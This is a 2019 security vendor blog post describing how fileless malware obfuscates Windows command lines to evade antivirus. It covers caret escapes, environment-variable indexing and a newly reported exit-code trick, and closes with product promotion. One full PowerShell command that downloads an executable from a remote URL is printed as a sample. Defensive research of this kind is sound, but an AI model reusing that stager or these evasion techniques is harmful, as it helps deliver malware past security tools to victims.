Dor Zvi

by Dor Zvi

Security Researcher, Mimecast

Posted Jun 04, 2019

The latest from Mimecast Research Labs includes a malware technique never observed previously.

GettyImages-890153720.jpg

Introduction

Fileless malware has become an increasingly popular technique among cyberattackers because it reduces the defender’s ability to detect malicious activity. Traditionally, cyberattackers rely on obfuscation techniques to hide their malicious activities and remain undetected as long as possible but counter-obfuscation tools—usually based on heuristics, activity monitoring and signature—can uncover their hidden activities and thwart attackers. Fileless attacks don’t write anything to disk, so it is harder for defenders to find anything.

Fileless attacks can also bypass whitelisting, which only allows pre-approved applications to execute, because they rely on built-in features and already-authorized applications that are already installed. Since IT technicians and network administrators use tools such as Command Prompt (cmd), Powershell and Windows Management Instrumentation (WMI) on a daily basis, detecting malware designed to exploit them is extremely challenging. Security operations teams cannot block these tools as they are required for the organization’s applications to work. In almost all cases, there are no alternatives.

Fileless malware is also easier to create, and can run in multiple environments and operating systems without any changes, or with only minor changes. This makes them cheap and reliable tools for attackers to develop and use. There are many toolkits and projects that can be used by cyberattackers in violation of the terms or intentions of their creators such as Empire, PowerSploit, and even Metasploit, which help attackers create new resilient malware that can bypass antivirus, exploit the target system, and exfiltrate data, usually with one or two clicks.

Don't miss the latest research from the Mimecast Research Labs team. Subscribe to Cyber Resilience Insights today.

One example of a fileless malware attack is MuddyWater APT, which uses several obfuscation techniques in multiple layers to cover its malicious activity. First reported in 2017, MuddyWater targeted governments in Iraq, Saudi Arabia, the Middle East, Europe and the US, and the attacks can still be found in the wild. MuddyWater campaigns are still targeting governments and organizations every day, but the hackers behind them are neither the first nor the last to employ the fileless malware strategy.

In this post, Mimecast Research Labs describes fileless attacks and the obfuscation techniques attackers use to make it difficult for anti-virus (AV) and other security tools to detect fileless malware. The post provides examples of basic and advanced techniques that have been used in real attacks, including the description of a novel technique that hasn’t been observed before and how Mimecast Targeted Threat Protection can help counter this techniques.

Common obfuscation techniques to bypass AV

Fileless malware can be used as the primary attack method or as a first-touch stager that downloads and executes other payloads from remote sources. To accomplish their goals, fileless malware employ different types of obfuscation techniques to bypass AV. These techniques have been used by all kinds of attackers—from amateurs to well-organized nation-state groups. The scale of the obfuscation, varying from basic to advanced, affects how often the malware is detected by AV.

For example, MuddyWater infects victim machines by sending targeted victims rigged Microsoft Word documents embedded with malicious macros. The macros run obfuscated VBscript code to launch Microsoft Windows built-in tools such as mhta.exe, WScript, or WMI, to download and run obfuscated Powershell code. The one-liner code decodes an encoded payload and executes it on the compromised machine. The multiple layers of obfuscation hides the document’s malicious capabilities and to bypass AV detection.

Character insertion obfuscations: One way to obfuscate malicious strings and commands is by using character insertion techniques, which add special characters designed to make known detected commands more complex. This kind of obfuscation breaks up important strings so it will be harder for static defending and signature-based products to parse malicious commands.

An example of character insertion obfuscation is the use of special characters, like commas (,) and semi-colons (;), which serve as whitespaces that are allowed almost anywhere in a command line as an argument. As shown below, both characters are commonly used together and separately:

Obfuscated fileless malware in attacker's toolkits.Using parentheses for obfuscation: Another obfuscation technique frequently seen in the wild is the use of unnecessary parentheses, which can be used to group expressions or split commands across multiple lines and make code more readable. Variables will be evaluated for the code block just as if the command were a single line. Attackers use this technique to further obfuscate commands in different forms. For example:

Obfuscated fileless malware in attacker's toolkits.Using caret for escape-based obfuscation: A third commonly-employed obfuscation technique relies on the Caret (^) special character, which is a reserved character used by shells for escaping. The Caret sign is commonly inserted as a single special character inside a command or paired with another special character that causes a double escape during execution time, as shown in the following example:

Obfuscated fileless malware in attacker's toolkits.However, after escaping the first layer Caret sign, the second layer can also be escaped:

Obfuscated fileless malware in attacker's toolkits.Finally, the escaped command will run a “powershell.exe” command with an argument:

Obfuscated fileless malware in attacker's toolkits.Using double quotes: Another basic technique embeds double quotes (“) in a command. Balanced double quotes that are inserted into a command line argument do not affect the command execution; however, the command line parser uses the double quote sign as an argument delimiter. Therefore, double quotes can be used maliciously for the concatenation of an argument. For example:Obfuscated fileless malware in attacker's toolkits.Advanced obfuscation techniques to remain undetected

Attackers can also use their victims’ environments against them to dynamically obfuscate malware, but keeping the code hidden until it is executed. This technique makes the detection of such malware much harder, giving hackers a greater chance of winning the cat-and-mouse game.

Using custom environment variables: One method is to use environment variables, dynamic objects that store editable values that can be used by Windows software programs. Environment variables obfuscate the command line and split it into different characters and strings. An easy way to use an environment variable is to create a custom one and dynamically set its values. This value can then be used for executing malicious commands:

Obfuscated fileless malware in attacker's toolkits.The command mentioned will execute “powershell.exe”.

Using pre-assigned environment variables: Another technique for using environment variables is getting specific characters from pre-assigned Windows environment variables. These characters are referenced by their index and later used for malicious purposes. The following is an illustration of this idea:

“%CommonProgramFiles%” is a default environment variable in a Windows operating system. This variable is pre-assigned by default with the value of: “C:\Program Files\Common Files”. This value can be used with indexing to get a specific char and use it in run commands:

Obfuscated fileless malware in attacker's toolkits.The indexing shown above retrieves a single character, starting at index 3 from “%CommonProgramFiles%”. This action results in a single character “P” which is later concatenated with “owerShell.exe” to receive “powershell.exe” and a result, which is then invoked.

The “cmd.exe” can also be replaced with “%ComSpec%”, a pre-assigned environment variable that, by default, stores the “cmd.exe” absolute path.

Obfuscated fileless malware in attacker's toolkits.Special technique found in our labs: Lastly, we will cover a special technique discovered by the Mimecast Research Labs team. This technique modifies the host environment without using a “set” command. Instead, it relies on an “exit” command with custom exit code and later uses the execution result to get an ASCII char representation, which is modified in the “%ExitCodeAscii%” environment variable. This ASCII char is used to get a command running.

To get the correct value of “%ExitCodeAscii%” the “exit” command must be run. As a result, the process running it will be terminated. To overcome this obstacle, the hacker can use “cmd.exe” in a couple of layers and abuse it to get the desired character:

Obfuscated fileless malware in attacker's toolkits.In this example, the outer cmd executes two other cmd instances one after another. The first executes an “exit 80” command and terminates. As a result, its parent “%ExitCodeAscii%” environment variable is updated to an ASCII representation of the number 80, with is actually the character “P”. This “P” value is later used by the second cmd instance, which executes the concatenation of “P” and the “owershell” that causes “Powershell.exe” to execute.

To emphasize the overall lack of knowledge around obfuscated virus attacks, see the attached detection rate screenshot from “Virustotal” of a file executing the command compared to that of a command that is obfuscated:

“C:\Windows\System32\cmd.exe /c powershell -bypass Invoke-Expression (New-Object System.Net.WebClient).DownloadFile("https://su.pr/7rnRZ6","C:\temp\m.exe")”

Obfuscated fileless malware in attacker's toolkits.

Obfuscated fileless malware in attacker's toolkits.

Afterword

Attackers invest a lot of time and effort to hide their unscrupulous activities, and fileless malware is increasingly used in these operations. To remain undetected and bypass AV, criminals usually use obfuscation techniques to make detection as difficult as possible.

Mimecast Targeted Threat Protection is designed to detect and block the use of this technique, by using advanced deep parsing and de-obfuscation, following real time code analysis of every analyzed file.

While this report shows the risks that are associated with ever-changing malware that looks to subvert tools that may already exist in your environment, there is a chance that you may detect this kind of attack over time as intel is shared between various security experts and platforms. The question, then, is clear: is that delay acceptable to your organization, given that seconds matter when attackers are targeting your enterprise? Mimecast capabilities are designed to prevent the threats of tomorrow, today.

SOES19_blog_footer.jpg

Want more great articles like this?Subscribe to our blog.

Get all the latest news, tips and articles delivered right to your inbox

Dor Zvi

by Dor Zvi

Security Researcher, Mimecast

Posted Jun 04, 2019

You may also like:

GandCrab Ransomware Attacks Exploit Valentine’s Day Weaknesses

This Valentine’s Day, your big hea…

This Valentine’s Day, your big heart could get you in … Read More >

Joshua Douglas

by Joshua Douglas

VP, Threat Intelligence

Posted Feb 14, 2019

The Return of the Equation Editor Exploit – DIFAT Overflow

The latest from Mimecast Research Labs. …

The latest from Mimecast Research Labs. Summary In the last… Read More >

Meni Farjon

by Meni Farjon

Chief Scientist for Advanced Threat Detection

Posted Mar 01, 2019

Baltimore Ransomware Attack Highlights Vulnerabilities in Municipal IT…

Resource-thin IT departments need a plan…

Resource-thin IT departments need a plan for cyber resilienc… Read More >

Marc French

by Marc French

Senior Vice President & Chief Trust Officer

Posted May 31, 2019